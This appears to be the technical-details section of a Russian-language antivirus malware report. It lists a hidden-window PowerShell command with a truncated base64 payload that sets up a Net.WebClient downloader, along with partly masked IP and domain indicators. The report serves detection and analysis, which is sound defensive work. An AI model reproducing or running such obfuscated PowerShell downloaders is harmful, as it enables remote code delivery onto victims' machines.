Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...
- '3.#.150.35':80
- DNS ASK if#c.ru
- DNS ASK ap#####trical.com.au
- DNS ASK ma##ha.ru
- DNS ASK ak####troi-dv.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYADAAXwA3ADIAXwBfAD0AKAAnAHcAMgAnACsAJwBfAF8AXwBfACcAKwAnADAAXwAnACkAOwAkAFMAMgAyADMAOQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQATgA1AF8ANABfADEAXwA9AC...' (со скрытым окном)